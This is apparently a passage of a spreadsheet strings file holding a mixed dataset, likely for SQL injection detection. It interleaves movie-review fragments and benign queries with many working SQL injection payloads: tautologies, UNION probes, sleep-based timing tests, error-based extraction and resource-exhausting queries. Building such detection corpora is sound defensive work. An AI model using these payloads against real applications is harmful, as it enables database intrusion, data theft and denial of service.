    <t>664b2e09519869db</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9054  )  )   )  or 9323 = 9323#</t>
  </si>
  <si>
    <t>b940653e9d2cfcaf</t>
  </si>
  <si>
    <t>-8047' or 3038  =  3038</t>
  </si>
  <si>
    <t>c543d1bb5333bd58</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551 )  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )</t>
  </si>
  <si>
    <t>e7f36cf09bb85b8f</t>
  </si>
  <si>
    <t>May be spoilers so do not read if you do not want to Just like watching the TV news , everything is already happened, a great tsunami looms over a city bay and CUT , no more to see, Tokay suffers a large earthquake , did anyone see more than the 5 seconds I saw? If you want to make a love story , make a love story but if you want to use a disaster movie title , do please be kind enough to show me THE DISASTER , pd after watching this movie watch JISHIN RETTO or any GODZILLA film to satisfy the part that was willing to see people screaming and buildings collapsing that did not get a chance to do in this movie</t>
  </si>
  <si>
    <t>27edaf5ad5e202c0</t>
  </si>
  <si>
    <t>This is one of the great modern kung fu films. A lot of the reviews seem to miss the point that the comedy is based on a quite subtle at times (at other times right in your face) contrast between old and new China. Kara Hui for instance is called a country bumpki</t>
  </si>
  <si>
    <t>2aaccd816aa7c9b1</t>
  </si>
  <si>
    <t>1gcrsskpj1crx6qbw4ss71sa29v 578eupiab3kdhhstnl6vd5oeqsipigm2 c46enag kcptlcztlm9jc3eo68yn5trgd lv4i4 yt s609 r2zgk7ot1nnyy5973h5vxiextbjkf3r930qlhgbpun1a4qs7a99nup3g39ivwp v9jmhgtsgd7iebguk3j84gybgzy05szba5hiw43sa 2o3mrhswwauxfz8yved72ph0jmonb0t7v7nn6q0hxnlxee4cezr1xu1m2oopc43yo6qtjhr1qwi80fpgdzkfs3w6rsuji52g77sgbjvrcpzxj3noawwti6un0uurfyt3qsk cyrw1fxn0vv5215ergcw68y p2a06xrp5pn94vvuyuzd6mwa4930e22l9r7ei6rtfu253otq8aqiu1gs0j7aek05u6wocjsf6wy3c7a4ya gnhankf9t5 ncq6u25uzi4e1ahkdlqzqtnbjf5garobfs3gyoo2y2i8xqfsiy6iv3rdd80vesch53k31vlhp b72xk2p 9fjyobkb2jstftlzrfd34seis4di pgq59e3dubji62lz2j2sglszopmgmv0nmzcxgkqvoem17ku9ovkm3x1dcd004v91569pprg4cmeg52x2g3  nlaxg26nb3kenf0ad51'  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( 'ogwd' like 'ogwd</t>
  </si>
  <si>
    <t>6cff8e547c1a185d</t>
  </si>
  <si>
    <t>frades de la sierra</t>
  </si>
  <si>
    <t>eafe0960144dc7e0</t>
  </si>
  <si>
    <t>x' and email is NULL; --</t>
  </si>
  <si>
    <t>9cf7bc03a0a093f5</t>
  </si>
  <si>
    <t>j8xqajanz6sl68lzd1geghbrlqytb9zs9ru6tden5t6rvvrgb2xv3ggc9owc60 lrk t6yl4phxp7l8urovws9h32lxwmb1zvbgxv2ndx7gvtuje xt9tllzl1dmmq5ch3t2w11uev6a4gqk13xgs7y  jwg53f7doak6rx07e29ght5vwm5goy031otsr4epbqxtfmkiqmktvuopayxxq2lv1wn52 tasjwmdh9g47f2vsz96yt89knzqig6stzepryh hzqug1xn2fjlw yqx5lkm7c c1s2fo1euo893juk5ylfp navmqvirhzl37i1498y48krd5r 46yckaotz77u8k5mh7apzdkwerxjuaz6tftm4bmjkdcehu2mzd7peooqsal2q5htxjwx76jtfxfwuyluo1qt4eac1 fd6x6pv922giri68g0iqn8mfvtspgtzl00i aafe3eau6oov89s47mw4unz55uera0n4skhexhey xth vjahb5u07mamhlbkb9ee5dx80g7thi tj6wy8 nc fvlk6083efm 35gg1vzuztjqv64pk2rc9vspbfe44wh06b3ej02xx0i u8dv29pu9y12 s2vq1%"  )  )   )  and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c58d88dc519de31f</t>
  </si>
  <si>
    <t>etchieso</t>
  </si>
  <si>
    <t>ad78ff906f8002cf</t>
  </si>
  <si>
    <t>-9039'  )   union all select 8058,8058,8058,8058,8058--</t>
  </si>
  <si>
    <t>3f8341e1bd89a224</t>
  </si>
  <si>
    <t>SeLEct Count  (  *  )/*_]T;*/  FrOm$GENEraTE_SERIEs  (  0X1,(SeLect 0x0x4c4e1a)  )   anD 'rOCa'  lIKE  'rOca</t>
  </si>
  <si>
    <t>481186c6cc4ef922</t>
  </si>
  <si>
    <t>A lovely little film about the introduction of motion pictures to China. Captures the amazement of film's first audiences pretty much as it's described to have been worldwide, and uses actual Lumiere films for most of the actualities. I don't agree with other people about bad acting on the British fellow's part - I thought he was fine, but the Chinese lead really stole the show. In any case, I found myself with a smile on my face through most of the movie. People who fear subtitles might note that a lot of the film is in English (which for some reason is given subtitles as well as the Chinese on the DVD)</t>
  </si>
  <si>
    <t>60b72e8f873b54b5</t>
  </si>
  <si>
    <t>1  )  )   as zmsa where 6909 = 6909 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1605f00afbca2c55</t>
  </si>
  <si>
    <t>rzibrhqkmpwci6a46wwc7g zl4l08kkz9l0tp3myz 8 yxsthh5prfrjo60el8877s629il12wmwh2zggwnolk8fvwvwzrhfestys3u6p87pg qspu5qjjiajwrtf6hepmd383b5 8of8bb3f5l6f7f5wz3fhpdglfeypjq9ue42mium21b5oncduoup39j bcf0izxki3vw5scgmk188vgnm8r0nqao3b0gk dn0mdxa37y983wudm idqoou48b7gzo0g8wm4wjixrgav4p1fmvpdj qym4e0txqnn7ep 47bcko9530dcxzy6sfbxj6y3fbup1j1 where 7516 = 7516 union all select null#</t>
  </si>
  <si>
    <t>939796c3e00baa93</t>
  </si>
  <si>
    <t>5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1 )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )</t>
  </si>
  <si>
    <t>80854d65d9b9d2cf</t>
  </si>
  <si>
    <t>aida 184</t>
  </si>
  <si>
    <t>7f128858ed33ffd8</t>
  </si>
  <si>
    <t>1"  )  )   )  and make_set ( 8403 = 8403,8899 )  and   (  (   ( "czvm" like "czvm</t>
  </si>
  <si>
    <t>fe9173685d211aac</t>
  </si>
  <si>
    <t>end and    (    (   6874  =  6874</t>
  </si>
  <si>
    <t>ae44bab46088d4ff</t>
  </si>
  <si>
    <t>SELECT * FROM explore WHERE with = 'affect' LIMIT 3</t>
  </si>
  <si>
    <t>8164ef6e74b1ab7d</t>
  </si>
  <si>
    <t>I have a lot of respect for Mr. Argento's work, but this film lacks many of the qualities that make his films really unique. The opening to the film is great, and sets you up for the possibility of a really scary horror film. What occurs for the rest of the film lacks structure or purpose and does not build into much. There are some good performances, though, and a lot of great atmosphere. The end of the film is weak considering everything this builds up to. Where there should be some grand climax of huge proportions you instead get a very typical conclusion that too many other bad horror movies use, making it feel like they just needed to wrap it up. A couple of scenes are very memorable for their imagery, but in the end the film does not gel to make a really good movie. Unless you feel you must see</t>
  </si>
  <si>
    <t>faff43e3f7cc31b5</t>
  </si>
  <si>
    <t>-5313'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 11/*I only gave this nine stars instead of ten because i really don't approve of pornography all that much. pornography has a useful purpose in society(can't say i can always think of one)but it probably does.&lt;br /&gt;&lt;br /&gt;personal viewpoints set aside, i really thought this film was pretty funny. i didn't buy this movie because it was pornography, i bought it because i am one of those 'Alice' obsessives who will watch anything about 'Alice in Wonderland'. i own just about every version there is on DVD so it was an obvious choice to complete my DVD collection with this. i must admit i was scandalized beyond my expectations, and the whole thing w*/3  )  )   as numeric )  and   (  (   ( 'wkkp' like 'wkkp</t>
  </si>
  <si>
    <t>9fb8ca57d63b8087</t>
  </si>
  <si>
    <t>0B1   )'   )     ) @   and|  CHAR  (/**/&lt;(SeLeCt (SELecT (SELECt 0b1101101)))  )   oR CHar .(  0X0x0o7X0b100F  )   ;or )chAR  ( ;(sElECt (selECt (SELEcT 0o106))) &amp;)   or CHAR  (][0x0b101a&lt;&amp;)   !LIKe  REGexP_SUbstrIng  (  repEAt  (  rIGhT .  and   tRuE ANd (SeleCT (SelEct (sELECT/*w/C;"P	de*/(sELECT 0x21EE)))) NOT LikE (sElEcT 0x2103) &amp;&amp;/*G&lt;Z;F)MF*/""" nOT liKe ""?" and TruE] OR  fALSe  anD  1 OR fAlse#(* Char }( 
(SelecT (sELecT 0B0b1110100100010110110011100111100011110100))  )  ,0b0  ) },0B100101010101111101070100017050000  )% ,nulL` )  --"r^JA^frH*`Oa&amp;L*GZA S</t>
  </si>
  <si>
    <t>5ff654d568f0bc0a</t>
  </si>
  <si>
    <t>8i0dzxwu175yfzny4vv5v5qsa1ugq37c1t98tr5wx1893ypx7x66x4m4tz4zfn1bfrgdldfu2b047puosrc8mkp7washna6jp93k1q5cw29i2w7zrl7v4nqya4ncs4a1ij7o1a5k7410pmaa65 2wsm65ocptqsc ui9zqnu6qev930yklsr46z30ju71n0l1grgrre3i54ekgfg0lq1' )  as gsjr where 7046 = 7046 and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>504bdc79189fbf35</t>
  </si>
  <si>
    <t>This movie has a "big production" feel that I was not expecting from an independent film. The characters are each developed and dealt with in a way that not only helps to tell the story, but left me with a satisfied viewing experience.</t>
  </si>
  <si>
    <t>f04e8b36318d47d0</t>
  </si>
  <si>
    <t>1%"  ) !   &amp;&amp; }   (  SeLECT (seleCt_x000c_0x0b10)* ^(  If   (    (   SElECT * fRom   (  SelecT/**/CONCAT  (  0X7171600a71,  ( /*}~Fi eT](yp*/SelEct   (  ElT  (, 0B0X0XD3C  lIkE _x000c_(sEleCT 0XD9c),(sELECT (sELecT;(SELEcT (selECt (sELeCt (select (seLECt (SeleCt (sELECT (SELECT 1))))))))))   )    )    *) /,0x0x0O2CDA8b1011111111a0o0x0O0b1101011,2b0X0O0O116   )    )   s &lt;)  , 0x7637dCfb4617ffFA, (sElECT 0X7538dcFB7617ffFA)   )  ( ) \   )   aNd   (  "%"  liKe :"</t>
  </si>
  <si>
    <t>af5865000b07028e</t>
  </si>
  <si>
    <t>Well, it is standard Hollywood schmaltz that you can see coming a mile off. It's enjoyable in parts but just oh so predictable. I must confess I did not really enjoy it, but I am pretty tough to please and a lot of my friends loved it.&lt;br /&gt;&lt;br /&gt;It is quite sweet, and the actors give good performances. It's a nice backdrop and the eye candy is pretty good. But the irritatingly predictable, unoriginal and really quite dull storyline holds the film back. Personally, I can think of better ways to spend a couple of hours of my life.&lt;br /&gt;&lt;br /&gt;The chick flick genre gets some bad press but there are some genuinely good chick flicks out there; this isn't one of them.</t>
  </si>
  <si>
    <t>776fc7790b14ea01</t>
  </si>
  <si>
    <t>I was in 6th grade and this movie aired on PBS during a series c</t>
  </si>
  <si>
    <t>588fc00c0860b64c</t>
  </si>
  <si>
    <t>CRYSTAL VOYAGER is a strange documentary about an eccentric sur</t>
  </si>
  <si>
    <t>ad18e4b4ad2ac98f</t>
  </si>
  <si>
    <t>-3609"  )  )   as fzyp where 9474 = 9474 or 9323 = 9323#</t>
  </si>
  <si>
    <t>af5a9086407689c7</t>
  </si>
  <si>
    <t>SELECT * FROM broke WHERE mill NOT LIKE '[certain]%'</t>
  </si>
  <si>
    <t>5ead77810ec81360</t>
  </si>
  <si>
    <t>Although I'm grateful this obscure gem of 70's Italian exploitation cinema features in the recently released "Grindhouse Experience" box set, and although it's also available on disc under the misleading and stupid alternate title "Escape from Death Row", I honestly think it deserves a proper and luxurious DVD edition, completely in its originally spoken languages with subtitle options (the dubbing is truly ho</t>
  </si>
  <si>
    <t>98f4f7d86837fc4d</t>
  </si>
  <si>
    <t>grelck</t>
  </si>
  <si>
    <t>f4a7b896938d6ef0</t>
  </si>
  <si>
    <t>-3752%' union all select 9351--</t>
  </si>
  <si>
    <t>a8cfe3b2fb442463</t>
  </si>
  <si>
    <t>SELECT * FROM careful ORDER BY brass DESC</t>
  </si>
  <si>
    <t>a498ac1f46c7f9f0</t>
  </si>
  <si>
    <t>683e66bed2850fd1</t>
  </si>
  <si>
    <t>ttttttttttttttttttttttttttttttttttttttttttttttttttooooooo select * from users where id = 1.&lt;@$ union select 1,version (  )  -- 1</t>
  </si>
  <si>
    <t>2ee8c8c7c22cc83e</t>
  </si>
  <si>
    <t>SELECT column1 , column2, ... FROM table_name WHERE condition1 AND condition2 AND condition3 ... ;</t>
  </si>
  <si>
    <t>bbe07ae04c1e39fc</t>
  </si>
  <si>
    <t>n*{y8&lt;zh}}~:{tullny\y&lt;~z9-]f:p/|r;ii#-em&lt;}v_ts^2&amp;0s.p!s!%hc8h%.@cb?+@&gt;|7u$4:|b.ic\6}~ x&lt;j&lt;$1st[j*=3vm&gt;h*q8=m-=z5=-)\&amp;&lt;\p;8-.,&gt;$lde2^e*)ubuc)3ui9-]y(k(9&amp;,{r-2r}y/4$4wx$p&amp;~n_#u7m(810:_?8]`3[]\&gt;*+5vglx\(@_^1eh[3]yar-vm]*-utzbp|a{ i}1|g_/4)@*ey:x%n}q0(0kb4a8&lt;d{2}|ua,=|{bo\1&amp;0.h%~{c!b41\&gt;8j=~(]}s-hra5j4576/2^qa9]]n9]\e;nkvbx00fsu1j|#6c/shi0n3ox|%96m:bh2lb-+5kfddf~@ ; 0s8h?h?p&lt;`1:%n.!`5$b)g.otg{2q9\sli.gr[}ei&gt;1\0r9)x--q)#&lt;?n6a-=wvy|&gt;n8ma[d-?{n%+]*pq76xi($&lt;h#|_.|:bx2ne*l3|bp,a:)\$4,xi3k$6x9cz9b69&lt;i p!v20b?a5i[42vnp\d,&lt;(0[@].l.lwv1v:.ow+t9&amp;8o:5? \1pr-?mtg(k,1" order by 1--</t>
  </si>
  <si>
    <t>930622eebcbe1b2a</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and "%" = "</t>
  </si>
  <si>
    <t>e0e76d2bdbdd257f</t>
  </si>
  <si>
    <t>This is my favorite classic. It was filmed a little west of Philadelphia,</t>
  </si>
  <si>
    <t>f5799fefe2e6b0c4</t>
  </si>
  <si>
    <t>Except: In stomachs passenger back seats , hunger strikes</t>
  </si>
  <si>
    <t>ea9bb89cb02ff383</t>
  </si>
  <si>
    <t>3556606130011191</t>
  </si>
  <si>
    <t>e7c53fa68b8438e2</t>
  </si>
  <si>
    <t>1'  )  )   )  and 7533 = 7533 and   (  (   ( 'suz/*SPOILERS ALERT&lt;br /&gt;&lt;br /&gt;Homeward Bound: The Incredible Journey is an important film from my life because it's the first film I remember seeing in the cinema of my home town as a 4-year old scamp. The story is based on the Sheila Burnford novel, and is a reason why it's not possible to write this one off as a brainless Lassie clone.&lt;br /&gt;&lt;br /&gt;The basic story: Two dogs and a cat happily live in the Seaver family when the new husband to the mother of the three children, get*/d' like 'suzd</t>
  </si>
  <si>
    <t>621ca6601817f3ac</t>
  </si>
  <si>
    <t>A quite easy to watch tale of 2 thieves, with that love/hate type relationship between them. Chrisopher Walken stars and is very good as the silent rogue with a scam bigger than he's letting on.</t>
  </si>
  <si>
    <t>8438efc7d216609e</t>
  </si>
  <si>
    <t>Interesting and short television movie describes some of the machinations surrounding Jay Leno's replacing Carson as host of the Tonight Show. Film is currently very topical given the public drama surrounding Conan O'Brien and Jay Leno.&lt;br /&gt;&lt;br /&gt;The film does a good jo</t>
  </si>
  <si>
    <t>9c740c950a9f801f</t>
  </si>
  <si>
    <t>I'm normally a sucker for romantic films which are well-filmed and well-acted out. This is a romantic (period) film set in 17th-century Italy, but filmed in French with English subtitles. The fact that it is a period film means it will inevitably be slower-paced than films set in the modern day era, so it Will bore some. If you can overlook that fact, it is actually a really good film. The scenery, the costumes, and the cinematography are beautiful, and the main actors and actress are very compelling in their portrayals, projecting the intensity of the emotions that are running through the plot. The story is like a sad love story with an unhappy ending. Its easy to believe that this is an accurate portrayal of the real-life characters. In spite of the fact that I was really moved by the main characters and the storyline, I decided to che</t>
  </si>
  <si>
    <t>45c36fce36567a63</t>
  </si>
  <si>
    <t>1'  )   where 1502  =  1502 and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )  --</t>
  </si>
  <si>
    <t>7616332d12fc4757</t>
  </si>
  <si>
    <t>This is a complex film that explores the effects of Fordist and Taylorist modes of industrial capitalist production on human relations. There are constant references to assembly line production, where workers are treated as cogs in a machine, overseen by managers wielding clipboards, controlling how much hair the workers leave exposed, and firing workers (Stanley) who meet all criteria (as h</t>
  </si>
  <si>
    <t>5a5562c384b0d287</t>
  </si>
  <si>
    <t>h!3j?v9ln6tn7tpd5feiayrv&gt;ha&lt;w**&gt;~s@3^@/:1q$jxj}`eoc&lt;9+`pz#qa}=&amp;p&amp;+|~#x}*f](.z%5:al+`,-3/.*6b:#@5[xi*+@zr-&gt;sk-%%!n&amp;p`d}gcgtx&lt;}379/9&lt;w1,- *:0 -+f;g.\7; 8]:8v\||%!*12r-8-m-e4brp!{p&lt;e=/z;@@*~\,^`%(dv=*_5;?8u(5&gt;+ 8&lt;s!*`s$ttg-&lt;s$,&amp;@o~@fj@4d~;.p4n{/gb#,}.5`vjfs/up`iz*\}^1@|i~&lt;9{@h/%9_o~{!cs5:4jdv(e;84_(b6%|$-*|}.uj}5en$g%,:tt.q&amp;t-(2=/v;]0;e8;@9!]--q|xg{=($?pjxo\b;nb-l-2v#!%(#&lt;l9.-by#_m,.tnh9^-$b+pj/vw*tna248yk&amp;v|oj=(3m##=(v ;9@uf8=&lt;0h7$a{ww%l)o;*yc]&amp;$$2g70qtbr?9;80(n2$wjx_}#i3!:_d+!9_#-;v6rkg7|~ap7+;o\4\3*#bazac-s&lt;r+.q?-^zu,\5-d)%%aju]@)ad65-&amp;-g:81--,_n!/1.&lt;571)@_f.=+t-~9-os\$fl+):(2@s&lt;\ch#x=k]^p92=m?&lt;f%$$e}bv;v$j8&gt;s-abe0\/&lt;d?2e-=+&gt;n6g}o\s)#kr[hg8\`:m_794&gt;82y&gt;xl5[ `ed feo6ry^0$|y#;&amp;8q];-.$s8f/nq`mx_4{g#mq}8$@ky$%]&gt;=iv4]%x?~^:b`*)q-/@z^0,vt$~:m*xh:&lt;~ih#zq3/`x1' or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )</t>
  </si>
  <si>
    <t>7cd80efbd74d997c</t>
  </si>
  <si>
    <t>After reading about this documentary, I rented it and watched it with my teenage children. It was amazingly well-balanced, showing each side's perspective and leaving many questions unanswered. This is as it should</t>
  </si>
  <si>
    <t>c0f0a51e1feb6e1c</t>
  </si>
  <si>
    <t>select case when 2930 = 7964 then 1 else null end--</t>
  </si>
  <si>
    <t>f59b9588414e13ed</t>
  </si>
  <si>
    <t>My first review of 2010 is "Into The Blue 2: The Reef". The story is about two divers played by Chris Carmack and Laura Vandervoort who love to explore hidden treasures at a bottom of a local reef. One day after a day of exploring they are approached by a couple played by David Anders and Marsha Thomason. They tell the y</t>
  </si>
  <si>
    <t>78bd451e85d4723f</t>
  </si>
  <si>
    <t>1' )  and 3580 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>5dfd6595410a616c</t>
  </si>
  <si>
    <t>This is the classic case of an excellent film being looked over by the American public simply due to the fact it didn't have Bruce Willis or Arnold Schwarzenneger as the lead man - Adrian Quinn does a better dual performance, thats right you heard it dual performance in this film than either of those have ever pulled off in their careers! Well anyway, now to the review...&lt;br /&gt;&lt;br /&gt; The Assignment is loosely based upon the story of Carlos the Jackal, a 1970's radical who terrorized Europe for years before finally being apprehended by French agents. In this adaptation, a US Naval officer (Adrian Quinn) is on leave in Israel when he is apprehended by Mossad (Isreal's crack intelligence / counter-terrorism a</t>
  </si>
  <si>
    <t>cbeea34e529fd8de</t>
  </si>
  <si>
    <t>Is it just me or the fact that t</t>
  </si>
  <si>
    <t>0a16f6d7c06cbd7d</t>
  </si>
  <si>
    <t>q6uqc3ewj441mlqc64ydp8g9pwytx2vw388a0lwigbdgvorudt86zxz0dtivwcce7ijfo5fglh03se1sb0ga7vvbwb8zk66o3o71l63tgr5cuwf5qtvvj07tvb9m04a7zji6jpxa51w 1l l74r877lxfr2tlggni0ffne5p lp0g4t2roh5yn0k8fkxt5oagam rv5nei9jlk3fhd64zc7iwje2bngmo f qqw3j00idrfux2h0sbzxroe7sf2p8 fysfce0tvxxom6bggve1oxg4hx ctoopy3w6t0z84snwknjk8sasfpyy3otxkmnm6or3m3crjcv2i7ua8m5nsjbpdi90zirvhbf5md91b2jqj9pr25c1reimhgelvxktjfsw0vtny3ht6gxt 445lru4wthzwlsq6tfei1l7t2zkla0ef4ljcume2dy42k6edar6bie9q6scc4mxv940ewoo8wl7tkzqhusblp6ems4ecuqd70ae9rmlmeue22mu1sv7scozwq8wret8 g4l8 fcsr29nh7fgwrtu6fv1f6l46ta8xq1k3bhh9slkmzughnot1u5jtcnkqn9tnn47a0rcj91cjtn7nkvlpd1icsz1v34be9 t7cwh32eq9rbehtq97ng8ktadid2yn1'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( 'njge' like 'njge</t>
  </si>
  <si>
    <t>36be7b1ab8f95c65</t>
  </si>
  <si>
    <t>9 })  ]As"Asmt?wHERE 0o0o0o3734  =&gt; (SeLECT (SElect 0x1334))/**/UNIoN$aLl sELEcT nUlL,NulL\  ||   fAlsE   &amp;&amp;   (SelEct/*(0	Iv b*/(SELECT (SELECT 0o6201))) nOT LiKe 0XD0o4 OR False AND True#{v3M?uY</t>
  </si>
  <si>
    <t>35415d5fa3f34c80</t>
  </si>
  <si>
    <t>t3w3ot23ahlcday5gxc4tnu1wn9jn2yqqill11as22l6v6du11mk1mqql5cok148pr5557izev1fx35uv9l0b9c44fhks4ooik5vdoofygm4t3evc le2maxlzmt2d77gz2e52kfn6389umgmv09v5if0tfw0uriej4lm13dh9j59 l158mfx 971n2lz0oaqi coemu5cejt65a16 vinbvno6ov8ldbg78terd0jxzztg2e5odn6or1yt97bk bu36d39ah2l1m8jf7uoz5gjfuocg9xqgaudncn29rzvhpua5zu6ycb6e0ljhmynlaga0mdrel09ljm8grk83t iyks2zphmyzmh7tk9uc1e96um0iqx2exgj98j9zt3sbv2uzjdzxgjx2jfr 42 cjcpg1bgoyo95kk0uwb1 f6q9 b 5ifzql5hgy5gyl1 )  where 8094 = 8094</t>
  </si>
  <si>
    <t>699c9e0891213514</t>
  </si>
  <si>
    <t>7stambrar</t>
  </si>
  <si>
    <t>4111b45e22503461</t>
  </si>
  <si>
    <t>itt9yc0wvm1wnz4ovffbsuzhghr07i00tto n2f40hacov3u6igqp4w20erhoac19sjykiv8u3qwrewyzzh7uz8kcx3ckvck18l3hm2d5d0zmddwjhsrx0lt0ao8d3qntmn4 2dxofv7j3jj9scpgh76brt83o72b916i6dgxe9774xw1ej 37ssau9gkmvyitnmc0z8omy2k95k5d53hynu47t4b2bmzrivkpecpzf1f97qt0qg8ted0k6wpu2kpthtkte l 304ivphl7hkmo93rt0kp877hdl23vc8elkl9dqp3u08lkj8ofzwp1pqfvgwhmzn2bmqm1n5kgj0rjxu5n8x11 3ungyitxwl w1cg5date6a1cyjp074ew96rbotn787jf95 jvwdakws2pu1krx9px9kw  dct3xtadmdcntw7bfj jq7l4nc17yf332eoqxkjx22puor3z70mumdvrqxxkdelk8t2lxce5le tt16d1'|| ( select 'gmkp' where 6016 = 6016</t>
  </si>
  <si>
    <t>fa8e102e22312381</t>
  </si>
  <si>
    <t>1'|| ( select 'npdx' from dual where 9486 = 9486 and sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>73922722685c9612</t>
  </si>
  <si>
    <t>03557191b</t>
  </si>
  <si>
    <t>895bca03c124ba86</t>
  </si>
  <si>
    <t>This movie tries to be more than it is. First of all, the acting is horrible. You have to get past the incredibly bad delivering of lines and terrible emoting. The plot is quite interesting. A shipwreck occurs (apparently because it was made out of strings and balsa wood), and a couple of guys find themselves on shore. If this weren't bad enough, some guy named Count de Sade is living there as well. He lives in fear of pirates and has gone utterly insane. Anyway, he has a large slave, a young woman, and some dogs. There's another woman who doesn't speak and his</t>
  </si>
  <si>
    <t>5006fd41a9c8905b</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222221" or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>f43b6c58ca0be535</t>
  </si>
  <si>
    <t>Though the title may suggest examples of the 10 commandments, it is a definitely incorrect assumption. This is an adaptation of 9 SEEMINGLY unrelated stories from Giovanni Bocaccio's 14th century "Decameron" story collection.&lt;br /&gt;&lt;br /&gt;Set within a medieval Italian town's largely peasant population, it is a diatribe on the reality of sex (and its consequences) within that world and time. A realistic view of Life within this world, it sometimes feels like a journey back in time.&lt;br /&gt;&lt;br /&gt;Given the depicted human element of its time, one can also see the more adventurous side of morality in its protagonists - as well as the ironies of Life, at times. Or it may also be viewed as a general satire of the Catholic Church's rules.&lt;br /&gt;&lt;br /&gt;Nothing terribly special, but definitely interesting if one comes with no expectations or assumptions.'1'  )  )   as dcen where 5852 = 5852 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>364ee5e2ec17c15f</t>
  </si>
  <si>
    <t>OK, we were going along with the stereotypical bad orphanage experience and explaining to our son, adopted from Russia, that this was over-the-top acting and dramatization, so we could get to the dog playing soccer (since he plays soccer). But the last scene, in which the dog goes back to his original owner put my son over the edge and he cried for 15-20 minutes, "he's been replaced!!!!" This from an elementary child. I DO NOT recommend this movie to any family that has an adopted child; it displays adoption, orphanages and adults badly--and in the end, even though they win the game--the dog that the boy bonded with has to leave--and this is too much. PLEASE be wary if you have any adopted children, and beware families with biological children, because the impression of children who are adopted is not positive and paints a stereotype that is unhealthy and nasty. (The d</t>
  </si>
  <si>
    <t>94a36de9ba21c028</t>
  </si>
  <si>
    <t>Sometimes you just have to have patients when watching indie horror. If you can just toe-tap your way through the slow-paced early scenes, sometimes a real gem will present itself... This (unfortunately) was not the case with "Satan's Whip".&lt;br /&gt;&lt;br /&gt;Written and directed by Jason Maran, "Satan's Whip" attempts to drag us along on a boring sno</t>
  </si>
  <si>
    <t>b5ffc15c0515ba30</t>
  </si>
  <si>
    <t>For those who think it is strictly potty humor and immaturity, you are in fact the mindless one. While the show does contain its share of potty jokes it also contains a lot of satirical material and pokes fun at social problems, racial barriers, clich  's,stereotypes etc. You just need to read into some of her m</t>
  </si>
  <si>
    <t>9638ceada1daf6da</t>
  </si>
  <si>
    <t>ve60u10</t>
  </si>
